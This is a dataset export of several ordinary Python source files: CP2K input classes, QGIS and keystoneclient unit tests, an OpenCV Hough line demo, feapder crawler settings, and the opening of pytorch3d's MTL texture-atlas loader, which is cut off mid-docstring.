blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
616
| content_id
stringlengths 40
40
| detected_licenses
sequencelengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 777
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 149
values | src_encoding
stringclasses 26
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 3
10.2M
| extension
stringclasses 188
values | content
stringlengths 3
10.2M
| authors
sequencelengths 1
1
| author_id
stringlengths 1
132
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
ae5f6a56b1dd9225cfb080b788cdc31d7483c321 | f3bd271bf00325881fb5b2533b9ef7f7448a75ec | /xcp2k/classes/_mc1.py | fa05bea2ae6ea09939c9d07048036355cd040bf2 | [] | no_license | obaica/xcp2k | 7f99fc9d494859e16b9b0ea8e217b0493f4b2f59 | 6e15c2c95658f545102595dc1783f5e03a9e6916 | refs/heads/master | 2020-07-15T17:27:43.378835 | 2019-02-11T16:32:24 | 2019-02-11T16:32:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,305 | py | from xcp2k.inputsection import InputSection
from _avbmc1 import _avbmc1
from _move_probabilities1 import _move_probabilities1
from _move_updates1 import _move_updates1
from _max_displacements1 import _max_displacements1
class _mc1(InputSection):
def __init__(self):
InputSection.__init__(self)
self.Nstep = None
self.Iprint = None
self.Nmoves = None
self.Nswapmoves = None
self.Lbias = None
self.Lstop = None
self.Ldiscrete = None
self.Rclus = None
self.Restart = None
self.Nvirial = None
self.Ensemble = None
self.Restart_file_name = None
self.Moves_file_name = None
self.Molecules_file_name = None
self.Coordinate_file_name = None
self.Energy_file_name = None
self.Data_file_name = None
self.Cell_file_name = None
self.Max_disp_file_name = None
self.Box2_file_name = None
self.Pressure = None
self.Temperature = None
self.Virial_temps = None
self.Discrete_step = None
self.Eta = None
self.Randomtoskip = None
self.AVBMC = _avbmc1()
self.MOVE_PROBABILITIES = _move_probabilities1()
self.MOVE_UPDATES = _move_updates1()
self.MAX_DISPLACEMENTS = _max_displacements1()
self._name = "MC"
self._keywords = {'Lstop': 'LSTOP', 'Nswapmoves': 'NSWAPMOVES', 'Lbias': 'LBIAS', 'Box2_file_name': 'BOX2_FILE_NAME', 'Nvirial': 'NVIRIAL', 'Ensemble': 'ENSEMBLE', 'Temperature': 'TEMPERATURE', 'Data_file_name': 'DATA_FILE_NAME', 'Pressure': 'PRESSURE', 'Restart': 'RESTART', 'Cell_file_name': 'CELL_FILE_NAME', 'Moves_file_name': 'MOVES_FILE_NAME', 'Iprint': 'IPRINT', 'Rclus': 'RCLUS', 'Eta': 'ETA', 'Molecules_file_name': 'MOLECULES_FILE_NAME', 'Virial_temps': 'VIRIAL_TEMPS', 'Randomtoskip': 'RANDOMTOSKIP', 'Max_disp_file_name': 'MAX_DISP_FILE_NAME', 'Restart_file_name': 'RESTART_FILE_NAME', 'Coordinate_file_name': 'COORDINATE_FILE_NAME', 'Nmoves': 'NMOVES', 'Discrete_step': 'DISCRETE_STEP', 'Energy_file_name': 'ENERGY_FILE_NAME', 'Ldiscrete': 'LDISCRETE', 'Nstep': 'NSTEP'}
self._subsections = {'AVBMC': 'AVBMC', 'MOVE_UPDATES': 'MOVE_UPDATES', 'MAX_DISPLACEMENTS': 'MAX_DISPLACEMENTS', 'MOVE_PROBABILITIES': 'MOVE_PROBABILITIES'}
| [
"[email protected]"
] | |
57abb1d492da22ca8039ba1f34f17f15d3e3ae53 | de626f1892619968efbaa22ea26079ee2269e799 | /test/test_Master_dialog.py | 02100573c7b18bcfb48fb78df5fb2f3d2c296df2 | [] | no_license | gerardoros/CartograficoQgisPlugin | 7e8724cec0469d0494090b3557e9d4e967935121 | 844fa1052f435478e2e946099d7dbd6b1b97c311 | refs/heads/master | 2023-04-04T08:06:30.967894 | 2021-04-07T14:15:37 | 2021-04-07T14:15:37 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,479 | py | # coding=utf-8
"""Dialog test.
.. note:: This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
"""
__author__ = 'Master'
__date__ = '2018-04-27'
__copyright__ = 'Copyright 2018, Master'
import unittest
from PyQt5.QtGui import QDialogButtonBox, QDialog
from Master_dialog import MasterDialog
from utilities import get_qgis_app
QGIS_APP = get_qgis_app()
class MasterDialogTest(unittest.TestCase):
"""Test dialog works."""
def setUp(self):
"""Runs before each test."""
self.dialog = MasterDialog(None)
def tearDown(self):
"""Runs after each test."""
self.dialog = None
def test_dialog_ok(self):
"""Test we can click OK."""
button = self.dialog.button_box.button(QDialogButtonBox.Ok)
button.click()
result = self.dialog.result()
self.assertEqual(result, QDialog.Accepted)
def test_dialog_cancel(self):
"""Test we can click cancel."""
button = self.dialog.button_box.button(QDialogButtonBox.Cancel)
button.click()
result = self.dialog.result()
self.assertEqual(result, QDialog.Rejected)
if __name__ == "__main__":
suite = unittest.makeSuite(MasterDialogTest)
runner = unittest.TextTestRunner(verbosity=2)
runner.run(suite)
| [
"[email protected]"
] | |
a96cb429f9ca4140e68c19d023448121c5c2e1c3 | 3ac84fa46db498e914f6e1aaf2eff490a63807a1 | /devstack/python-keystoneclient/keystoneclient/tests/auth/test_identity_common.py | 4a0cf572983e9f76f36dece4f158b8966f464bf9 | [
"Apache-2.0",
"BSD-2-Clause"
] | permissive | onsoku/horizon_review | 3c5f1a8f863142f3f724f59771ad39604bca4c20 | 80cca0badc61b4754ef2c10f23a0ee48cd227445 | refs/heads/master | 2020-05-20T11:11:25.625186 | 2015-01-21T01:01:59 | 2015-01-21T01:01:59 | 29,002,325 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,422 | py | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import abc
import datetime
import uuid
from oslo.utils import timeutils
import six
from keystoneclient import access
from keystoneclient.auth import base
from keystoneclient.auth.identity import v2
from keystoneclient.auth.identity import v3
from keystoneclient import fixture
from keystoneclient import session
from keystoneclient.tests import utils
@six.add_metaclass(abc.ABCMeta)
class CommonIdentityTests(object):
TEST_ROOT_URL = 'http://127.0.0.1:5000/'
TEST_ROOT_ADMIN_URL = 'http://127.0.0.1:35357/'
TEST_COMPUTE_PUBLIC = 'http://nova/novapi/public'
TEST_COMPUTE_INTERNAL = 'http://nova/novapi/internal'
TEST_COMPUTE_ADMIN = 'http://nova/novapi/admin'
TEST_PASS = uuid.uuid4().hex
def setUp(self):
super(CommonIdentityTests, self).setUp()
self.TEST_URL = '%s%s' % (self.TEST_ROOT_URL, self.version)
self.TEST_ADMIN_URL = '%s%s' % (self.TEST_ROOT_ADMIN_URL, self.version)
self.TEST_DISCOVERY = fixture.DiscoveryList(href=self.TEST_ROOT_URL)
self.stub_auth_data()
@abc.abstractmethod
def create_auth_plugin(self, **kwargs):
"""Create an auth plugin that makes sense for the auth data.
It doesn't really matter what auth mechanism is used but it should be
appropriate to the API version.
"""
@abc.abstractmethod
def get_auth_data(self, **kwargs):
"""Return fake authentication data.
This should register a valid token response and ensure that the compute
endpoints are set to TEST_COMPUTE_PUBLIC, _INTERNAL and _ADMIN.
"""
def stub_auth_data(self, **kwargs):
token = self.get_auth_data(**kwargs)
self.stub_auth(json=token)
@abc.abstractproperty
def version(self):
"""The API version being tested."""
def test_discovering(self):
self.stub_url('GET', [],
base_url=self.TEST_COMPUTE_ADMIN,
json=self.TEST_DISCOVERY)
body = 'SUCCESS'
# which gives our sample values
self.stub_url('GET', ['path'], text=body)
a = self.create_auth_plugin()
s = session.Session(auth=a)
resp = s.get('/path', endpoint_filter={'service_type': 'compute',
'interface': 'admin',
'version': self.version})
self.assertEqual(200, resp.status_code)
self.assertEqual(body, resp.text)
new_body = 'SC SUCCESS'
# if we don't specify a version, we use the URL from the SC
self.stub_url('GET', ['path'],
base_url=self.TEST_COMPUTE_ADMIN,
text=new_body)
resp = s.get('/path', endpoint_filter={'service_type': 'compute',
'interface': 'admin'})
self.assertEqual(200, resp.status_code)
self.assertEqual(new_body, resp.text)
def test_discovery_uses_session_cache(self):
# register responses such that if the discovery URL is hit more than
# once then the response will be invalid and not point to COMPUTE_ADMIN
resps = [{'json': self.TEST_DISCOVERY}, {'status_code': 500}]
self.requests.register_uri('GET', self.TEST_COMPUTE_ADMIN, resps)
body = 'SUCCESS'
self.stub_url('GET', ['path'], text=body)
# now either of the two plugins I use, it should not cause a second
# request to the discovery url.
s = session.Session()
a = self.create_auth_plugin()
b = self.create_auth_plugin()
for auth in (a, b):
resp = s.get('/path',
auth=auth,
endpoint_filter={'service_type': 'compute',
'interface': 'admin',
'version': self.version})
self.assertEqual(200, resp.status_code)
self.assertEqual(body, resp.text)
def test_discovery_uses_plugin_cache(self):
# register responses such that if the discovery URL is hit more than
# once then the response will be invalid and not point to COMPUTE_ADMIN
resps = [{'json': self.TEST_DISCOVERY}, {'status_code': 500}]
self.requests.register_uri('GET', self.TEST_COMPUTE_ADMIN, resps)
body = 'SUCCESS'
self.stub_url('GET', ['path'], text=body)
# now either of the two sessions I use, it should not cause a second
# request to the discovery url.
sa = session.Session()
sb = session.Session()
auth = self.create_auth_plugin()
for sess in (sa, sb):
resp = sess.get('/path',
auth=auth,
endpoint_filter={'service_type': 'compute',
'interface': 'admin',
'version': self.version})
self.assertEqual(200, resp.status_code)
self.assertEqual(body, resp.text)
def test_discovering_with_no_data(self):
# which returns discovery information pointing to TEST_URL but there is
# no data there.
self.stub_url('GET', [],
base_url=self.TEST_COMPUTE_ADMIN,
status_code=400)
# so the url that will be used is the same TEST_COMPUTE_ADMIN
body = 'SUCCESS'
self.stub_url('GET', ['path'], base_url=self.TEST_COMPUTE_ADMIN,
text=body, status_code=200)
a = self.create_auth_plugin()
s = session.Session(auth=a)
resp = s.get('/path', endpoint_filter={'service_type': 'compute',
'interface': 'admin',
'version': self.version})
self.assertEqual(200, resp.status_code)
self.assertEqual(body, resp.text)
def test_asking_for_auth_endpoint_ignores_checks(self):
a = self.create_auth_plugin()
s = session.Session(auth=a)
auth_url = s.get_endpoint(service_type='compute',
interface=base.AUTH_INTERFACE)
self.assertEqual(self.TEST_URL, auth_url)
def _create_expired_auth_plugin(self, **kwargs):
expires = timeutils.utcnow() - datetime.timedelta(minutes=20)
expired_token = self.get_auth_data(expires=expires)
expired_auth_ref = access.AccessInfo.factory(body=expired_token)
body = 'SUCCESS'
self.stub_url('GET', ['path'],
base_url=self.TEST_COMPUTE_ADMIN, text=body)
a = self.create_auth_plugin(**kwargs)
a.auth_ref = expired_auth_ref
return a
def test_reauthenticate(self):
a = self._create_expired_auth_plugin()
expired_auth_ref = a.auth_ref
s = session.Session(auth=a)
self.assertIsNot(expired_auth_ref, a.get_access(s))
def test_no_reauthenticate(self):
a = self._create_expired_auth_plugin(reauthenticate=False)
expired_auth_ref = a.auth_ref
s = session.Session(auth=a)
self.assertIs(expired_auth_ref, a.get_access(s))
def test_invalidate(self):
a = self.create_auth_plugin()
s = session.Session(auth=a)
# trigger token fetching
s.get_token()
self.assertTrue(a.auth_ref)
self.assertTrue(a.invalidate())
self.assertIsNone(a.auth_ref)
self.assertFalse(a.invalidate())
class V3(CommonIdentityTests, utils.TestCase):
@property
def version(self):
return 'v3'
def get_auth_data(self, **kwargs):
token = fixture.V3Token(**kwargs)
region = 'RegionOne'
svc = token.add_service('identity')
svc.add_standard_endpoints(admin=self.TEST_ADMIN_URL, region=region)
svc = token.add_service('compute')
svc.add_standard_endpoints(admin=self.TEST_COMPUTE_ADMIN,
public=self.TEST_COMPUTE_PUBLIC,
internal=self.TEST_COMPUTE_INTERNAL,
region=region)
return token
def stub_auth(self, subject_token=None, **kwargs):
if not subject_token:
subject_token = self.TEST_TOKEN
kwargs.setdefault('headers', {})['X-Subject-Token'] = subject_token
self.stub_url('POST', ['auth', 'tokens'], **kwargs)
def create_auth_plugin(self, **kwargs):
kwargs.setdefault('auth_url', self.TEST_URL)
kwargs.setdefault('username', self.TEST_USER)
kwargs.setdefault('password', self.TEST_PASS)
return v3.Password(**kwargs)
class V2(CommonIdentityTests, utils.TestCase):
@property
def version(self):
return 'v2.0'
def create_auth_plugin(self, **kwargs):
kwargs.setdefault('auth_url', self.TEST_URL)
kwargs.setdefault('username', self.TEST_USER)
kwargs.setdefault('password', self.TEST_PASS)
return v2.Password(**kwargs)
def get_auth_data(self, **kwargs):
token = fixture.V2Token(**kwargs)
region = 'RegionOne'
svc = token.add_service('identity')
svc.add_endpoint(self.TEST_ADMIN_URL, region=region)
svc = token.add_service('compute')
svc.add_endpoint(public=self.TEST_COMPUTE_PUBLIC,
internal=self.TEST_COMPUTE_INTERNAL,
admin=self.TEST_COMPUTE_ADMIN,
region=region)
return token
def stub_auth(self, **kwargs):
self.stub_url('POST', ['tokens'], **kwargs)
class CatalogHackTests(utils.TestCase):
TEST_URL = 'http://keystone.server:5000/v2.0'
OTHER_URL = 'http://other.server:5000/path'
IDENTITY = 'identity'
BASE_URL = 'http://keystone.server:5000/'
V2_URL = BASE_URL + 'v2.0'
V3_URL = BASE_URL + 'v3'
def test_getting_endpoints(self):
disc = fixture.DiscoveryList(href=self.BASE_URL)
self.stub_url('GET',
['/'],
base_url=self.BASE_URL,
json=disc)
token = fixture.V2Token()
service = token.add_service(self.IDENTITY)
service.add_endpoint(public=self.V2_URL,
admin=self.V2_URL,
internal=self.V2_URL)
self.stub_url('POST',
['tokens'],
base_url=self.V2_URL,
json=token)
v2_auth = v2.Password(self.V2_URL,
username=uuid.uuid4().hex,
password=uuid.uuid4().hex)
sess = session.Session(auth=v2_auth)
endpoint = sess.get_endpoint(service_type=self.IDENTITY,
interface='public',
version=(3, 0))
self.assertEqual(self.V3_URL, endpoint)
def test_returns_original_when_discover_fails(self):
token = fixture.V2Token()
service = token.add_service(self.IDENTITY)
service.add_endpoint(public=self.V2_URL,
admin=self.V2_URL,
internal=self.V2_URL)
self.stub_url('POST',
['tokens'],
base_url=self.V2_URL,
json=token)
self.stub_url('GET', [], base_url=self.BASE_URL, status_code=404)
v2_auth = v2.Password(self.V2_URL,
username=uuid.uuid4().hex,
password=uuid.uuid4().hex)
sess = session.Session(auth=v2_auth)
endpoint = sess.get_endpoint(service_type=self.IDENTITY,
interface='public',
version=(3, 0))
self.assertEqual(self.V2_URL, endpoint)
| [
"[email protected]"
] | |
20753a5eec6cbef1d2f88ca4dca223a00463326f | ef9dfb78938ecf500f2378a84eca8051255a836c | /star-travel/venv/bin/pycodestyle | 93fb5f501bc9e2c6985163ea18cf05d0f8008eee | [] | no_license | lesage20/djangoinitiation | cd11ed6a1cb16356075f4af3be8a93db31ba8c9f | 818e3593d16c1fac5b2741605a4675d7833c18b2 | refs/heads/master | 2021-02-16T18:24:02.846455 | 2020-03-11T04:44:24 | 2020-03-11T04:44:24 | 245,033,422 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 247 | #!/Users/nan/Desktop/star-travel/venv/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from pycodestyle import _main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(_main())
| [
"[email protected]"
] | ||
9eb258cdc6b65a9919a795440b6beb5e84713442 | bdd40ea113fdf2f04ef7d61a096a575322928d1d | /Rupesh/opencv/Opencv_Python/Probabilistic_hough_line_L4_6.py | dd657873e7607cacae08499456287fe764d0fb17 | [] | no_license | rupesh7399/rupesh | 3eebf924d33790c29636ad59433e10444b74bc2f | 9b746acf37ab357c147cdada1de5458c5fc64f53 | refs/heads/master | 2020-12-22T05:01:29.176696 | 2020-03-03T10:32:36 | 2020-03-03T10:32:36 | 202,111,967 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 666 | py | import cv2
import numpy as np
# Grayscale and Canny Edges extracted
image = cv2.imread('images/soduku.jpg')
gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
edges = cv2.Canny(gray, 100, 170, apertureSize = 3)
# Again we use the same rho and theta accuracies
# However, we specific a minimum vote (pts along line) of 100
# and Min line length of 5 pixels and max gap between lines of 10 pixels
lines = cv2.HoughLinesP(edges, 1, np.pi / 180, 200, 5, 10)
print(lines.shape)
for line in lines:
for x1,y1,x2,y2 in line:
cv2.line(image, (x1, y1), (x2, y2),(0, 255, 0), 3)
cv2.imshow('Probabilistic Hough Lines', image)
cv2.waitKey(0)
cv2.destroyAllWindows()
| [
"[email protected]"
] | |
700d87cb74a2cd087f84aba3b9e72437ec8f0300 | 8dbb7d4a57a29550568ea9b005ade6542bb546fd | /baidu-spider/setting.py | 6b7cf57e85f3e0f1b010ad7af1e0b45f29d2f094 | [] | no_license | kalicc/feapder_project | 96e4b0d575d61967fff445d62267abe0d1b0d7af | 19820eb7da8f9cec32a11bdcfc47232917743896 | refs/heads/master | 2023-08-05T00:44:36.822548 | 2021-09-24T10:02:53 | 2021-09-24T10:02:53 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,628 | py | # -*- coding: utf-8 -*-
"""爬虫配置文件"""
# import os
# import sys
#
# MYSQL
MYSQL_IP = "localhost"
MYSQL_PORT = 3306
MYSQL_DB = "feapder"
MYSQL_USER_NAME = "feapder"
MYSQL_USER_PASS = "feapder123"
#
# # MONGODB
# MONGO_IP = os.getenv("MONGO_IP", "localhost")
# MONGO_PORT = int(os.getenv("MONGO_PORT", 27017))
# MONGO_DB = os.getenv("MONGO_DB")
# MONGO_USER_NAME = os.getenv("MONGO_USER_NAME")
# MONGO_USER_PASS = os.getenv("MONGO_USER_PASS")
#
# REDIS
# ip:port 多个可写为列表或者逗号隔开 如 ip1:port1,ip2:port2 或 ["ip1:port1", "ip2:port2"]
REDISDB_IP_PORTS = "localhost:6379"
# REDISDB_USER_PASS = os.getenv("REDISDB_USER_PASS")
# # 默认 0 到 15 共16个数据库
# REDISDB_DB = int(os.getenv("REDISDB_DB", 0))
# # 适用于redis哨兵模式
# REDISDB_SERVICE_NAME = os.getenv("REDISDB_SERVICE_NAME")
#
# # 数据入库的pipeline,可自定义,默认MysqlPipeline
# ITEM_PIPELINES = [
# "feapder.pipelines.mysql_pipeline.MysqlPipeline",
# # "feapder.pipelines.mongo_pipeline.MongoPipeline",
# ]
#
# # 爬虫相关
# # COLLECTOR
# COLLECTOR_SLEEP_TIME = 1 # 从任务队列中获取任务到内存队列的间隔
# COLLECTOR_TASK_COUNT = 10 # 每次获取任务数量
#
# # SPIDER
# SPIDER_THREAD_COUNT = 1 # 爬虫并发数
# SPIDER_SLEEP_TIME = 0 # 下载时间间隔 单位秒。 支持随机 如 SPIDER_SLEEP_TIME = [2, 5] 则间隔为 2~5秒之间的随机数,包含2和5
# SPIDER_TASK_COUNT = 1 # 每个parser从内存队列中获取任务的数量
# SPIDER_MAX_RETRY_TIMES = 100 # 每个请求最大重试次数
# AUTO_STOP_WHEN_SPIDER_DONE = True # 爬虫是否自动结束
#
# # 浏览器渲染
# WEBDRIVER = dict(
# pool_size=1, # 浏览器的数量
# load_images=True, # 是否加载图片
# user_agent=None, # 字符串 或 无参函数,返回值为user_agent
# proxy=None, # xxx.xxx.xxx.xxx:xxxx 或 无参函数,返回值为代理地址
# headless=False, # 是否为无头浏览器
# driver_type="CHROME", # CHROME、PHANTOMJS、FIREFOX
# timeout=30, # 请求超时时间
# window_size=(1024, 800), # 窗口大小
# executable_path=None, # 浏览器路径,默认为默认路径
# render_time=0, # 渲染时长,即打开网页等待指定时间后再获取源码
# custom_argument=["--ignore-certificate-errors"], # 自定义浏览器渲染参数
# )
#
# # 爬虫启动时,重新抓取失败的requests
# RETRY_FAILED_REQUESTS = False
# # 保存失败的request
# SAVE_FAILED_REQUEST = True
# # request防丢机制。(指定的REQUEST_LOST_TIMEOUT时间内request还没做完,会重新下发 重做)
# REQUEST_LOST_TIMEOUT = 600 # 10分钟
# # request网络请求超时时间
# REQUEST_TIMEOUT = 22 # 等待服务器响应的超时时间,浮点数,或(connect timeout, read timeout)元组
#
# # 下载缓存 利用redis缓存,但由于内存大小限制,所以建议仅供开发调试代码时使用,防止每次debug都需要网络请求
# RESPONSE_CACHED_ENABLE = False # 是否启用下载缓存 成本高的数据或容易变需求的数据,建议设置为True
# RESPONSE_CACHED_EXPIRE_TIME = 3600 # 缓存时间 秒
# RESPONSE_CACHED_USED = False # 是否使用缓存 补采数据时可设置为True
#
# # 设置代理
# PROXY_EXTRACT_API = None # 代理提取API ,返回的代理分割符为\r\n
# PROXY_ENABLE = True
#
# # 随机headers
# RANDOM_HEADERS = True
# # UserAgent类型 支持 'chrome', 'opera', 'firefox', 'internetexplorer', 'safari',若不指定则随机类型
# USER_AGENT_TYPE = "chrome"
# # 默认使用的浏览器头 RANDOM_HEADERS=True时不生效
# DEFAULT_USERAGENT = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36"
# # requests 使用session
# USE_SESSION = False
#
# # 去重
# ITEM_FILTER_ENABLE = False # item 去重
# REQUEST_FILTER_ENABLE = False # request 去重
#
# # 报警 支持钉钉、企业微信、邮件
# # 钉钉报警
# DINGDING_WARNING_URL = "" # 钉钉机器人api
# DINGDING_WARNING_PHONE = "" # 报警人 支持列表,可指定多个
# # 邮件报警
# EMAIL_SENDER = "" # 发件人
# EMAIL_PASSWORD = "" # 授权码
# EMAIL_RECEIVER = "" # 收件人 支持列表,可指定多个
# EMAIL_SMTPSERVER = "smtp.163.com" # 邮件服务器 默认为163邮箱
# # 企业微信报警
# WECHAT_WARNING_URL = "" # 企业微信机器人api
# WECHAT_WARNING_PHONE = "" # 报警人 将会在群内@此人, 支持列表,可指定多人
# WECHAT_WARNING_ALL = False # 是否提示所有人, 默认为False
# # 时间间隔
# WARNING_INTERVAL = 3600 # 相同报警的报警时间间隔,防止刷屏; 0表示不去重
# WARNING_LEVEL = "DEBUG" # 报警级别, DEBUG / ERROR
# WARNING_FAILED_COUNT = 1000 # 任务失败数 超过WARNING_FAILED_COUNT则报警
#
# LOG_NAME = os.path.basename(os.getcwd())
# LOG_PATH = "log/%s.log" % LOG_NAME # log存储路径
# LOG_LEVEL = "DEBUG"
# LOG_COLOR = True # 是否带有颜色
# LOG_IS_WRITE_TO_CONSOLE = True # 是否打印到控制台
# LOG_IS_WRITE_TO_FILE = False # 是否写文件
# LOG_MODE = "w" # 写文件的模式
# LOG_MAX_BYTES = 10 * 1024 * 1024 # 每个日志文件的最大字节数
# LOG_BACKUP_COUNT = 20 # 日志文件保留数量
# LOG_ENCODING = "utf8" # 日志文件编码
# OTHERS_LOG_LEVAL = "ERROR" # 第三方库的log等级
#
# # 切换工作路径为当前项目路径
# project_path = os.path.abspath(os.path.dirname(__file__))
# os.chdir(project_path) # 切换工作路经
# sys.path.insert(0, project_path)
# print('当前工作路径为 ' + os.getcwd())
| [
"[email protected]"
] | |
c624db327e351b58c163be9c5581a3b6da482442 | cc75f278846363dfa23d35e0a580cf2bfde700d1 | /pytorch3d/io/mtl_io.py | f194b976b437de447635a34d0df6897064ca736f | [
"BSD-3-Clause"
] | permissive | 2429581027/pytorch3d | 78a0da94484f09f778a867d897e38905f355b60f | 5d65a0cf8c9a1fb755fd09ce098bcedb0c670d80 | refs/heads/master | 2022-12-25T12:42:44.861890 | 2020-10-06T22:53:45 | 2020-10-06T22:55:05 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 19,197 | py | # Copyright (c) Facebook, Inc. and its affiliates. All rights reserved.
"""This module implements utility functions for loading .mtl files and textures."""
import os
import warnings
from typing import Dict, List, Optional, Tuple
import numpy as np
import torch
import torch.nn.functional as F
from pytorch3d.io.utils import _open_file, _read_image
def make_mesh_texture_atlas(
material_properties: Dict,
texture_images: Dict,
face_material_names,
faces_verts_uvs: torch.Tensor,
texture_size: int,
texture_wrap: Optional[str],
) -> torch.Tensor:
"""
Given properties for materials defined in the .mtl file, and the face texture uv
coordinates, construct an (F, R, R, 3) texture atlas where R is the texture_size
and F is the number of faces in the mesh.
Args:
material_properties: dict of properties for each material. If a material
does not have any properties it will have an emtpy dict.
texture_images: dict of material names and texture images
face_material_names: numpy array of the material name corresponding to each
face. Faces which don't have an associated material will be an empty string.
For these faces, a uniform white texture is assigned.
faces_verts_uvs: LongTensor of shape (F, 3, 2) giving the uv coordinates for each
vertex in the face.
texture_size: the resolution of the per face texture map returned by this function.
Each face will have a texture map of shape (texture_size, texture_size, 3).
texture_wrap: string, one of ["repeat", "clamp", None]
If `texture_wrap="repeat"` for uv values outside the range [0, 1] the integer part
is ignored and a repeating pattern is formed.
If `texture_wrap="clamp"` the values are clamped to the range [0, 1].
If None, do nothing.
Returns:
atlas: FloatTensor of shape (F, texture_size, texture_size, 3) giving the per
face texture map.
"""
# Create an R x R texture map per face in the mesh
R = texture_size
F = faces_verts_uvs.shape[0]
# Initialize the per face texture map to a white color.
# TODO: allow customization of this base color?
# pyre-fixme[16]: `Tensor` has no attribute `new_ones`.
atlas = faces_verts_uvs.new_ones(size=(F, R, R, 3))
# Check for empty materials.
if not material_properties and not texture_images:
return atlas
if texture_wrap == "repeat":
# If texture uv coordinates are outside the range [0, 1] follow
# the convention GL_REPEAT in OpenGL i.e the integer part of the coordinate
# will be ignored and a repeating pattern is formed.
# Shapenet data uses this format see:
# https://shapenet.org/qaforum/index.php?qa=15&qa_1=why-is-the-texture-coordinate-in-the-obj-file-not-in-the-range # noqa: B950
# pyre-fixme[16]: `ByteTensor` has no attribute `any`.
if (faces_verts_uvs > 1).any() or (faces_verts_uvs < 0).any():
msg = "Texture UV coordinates outside the range [0, 1]. \
The integer part will be ignored to form a repeating pattern."
warnings.warn(msg)
# pyre-fixme[9]: faces_verts_uvs has type `Tensor`; used as `int`.
# pyre-fixme[58]: `%` is not supported for operand types `Tensor` and `int`.
faces_verts_uvs = faces_verts_uvs % 1
elif texture_wrap == "clamp":
# Clamp uv coordinates to the [0, 1] range.
faces_verts_uvs = faces_verts_uvs.clamp(0.0, 1.0)
# Iterate through the material properties - not
# all materials have texture images so this has to be
# done separately to the texture interpolation.
for material_name, props in material_properties.items():
# Bool to indicate which faces use this texture map.
faces_material_ind = torch.from_numpy(face_material_names == material_name).to(
faces_verts_uvs.device
)
if faces_material_ind.sum() > 0:
# For these faces, update the base color to the
# diffuse material color.
if "diffuse_color" not in props:
continue
atlas[faces_material_ind, ...] = props["diffuse_color"][None, :]
# Iterate through the materials used in this mesh. Update the
# texture atlas for the faces which use this material.
# Faces without texture are white.
for material_name, image in list(texture_images.items()):
# Only use the RGB colors
if image.shape[2] == 4:
image = image[:, :, :3]
# Reverse the image y direction
image = torch.flip(image, [0]).type_as(faces_verts_uvs)
# Bool to indicate which faces use this texture map.
faces_material_ind = torch.from_numpy(face_material_names == material_name).to(
faces_verts_uvs.device
)
# Find the subset of faces which use this texture with this texture image
uvs_subset = faces_verts_uvs[faces_material_ind, :, :]
# Update the texture atlas for the faces which use this texture.
# TODO: should the texture map values be multiplied
# by the diffuse material color (i.e. use *= as the atlas has
# been initialized to the diffuse color)?. This is
# not being done in SoftRas.
atlas[faces_material_ind, :, :] = make_material_atlas(image, uvs_subset, R)
return atlas
def make_material_atlas(
image: torch.Tensor, faces_verts_uvs: torch.Tensor, texture_size: int
) -> torch.Tensor:
r"""
Given a single texture image and the uv coordinates for all the
face vertices, create a square texture map per face using
the formulation from [1].
For a triangle with vertices (v0, v1, v2) we can create a barycentric coordinate system
with the x axis being the vector (v0 - v2) and the y axis being the vector (v1 - v2).
The barycentric coordinates range from [0, 1] in the +x and +y direction so this creates
a triangular texture space with vertices at (0, 1), (0, 0) and (1, 0).
The per face texture map is of shape (texture_size, texture_size, 3)
which is a square. To map a triangular texture to a square grid, each
triangle is parametrized as follows (e.g. R = texture_size = 3):
The triangle texture is first divided into RxR = 9 subtriangles which each
map to one grid cell. The numbers in the grid cells and triangles show the mapping.
..code-block::python
Triangular Texture Space:
1
|\
|6 \
|____\
|\ 7 |\
|3 \ |4 \
|____\|____\
|\ 8 |\ 5 |\
|0 \ |1 \ |2 \
|____\|____\|____\
0 1
Square per face texture map:
R ____________________
| | | |
| 6 | 7 | 8 |
|______|______|______|
| | | |
| 3 | 4 | 5 |
|______|______|______|
| | | |
| 0 | 1 | 2 |
|______|______|______|
0 R
The barycentric coordinates of each grid cell are calculated using the
xy coordinates:
..code-block::python
The cartesian coordinates are:
Grid 1:
R ____________________
| | | |
| 20 | 21 | 22 |
|______|______|______|
| | | |
| 10 | 11 | 12 |
|______|______|______|
| | | |
| 00 | 01 | 02 |
|______|______|______|
0 R
where 02 means y = 0, x = 2
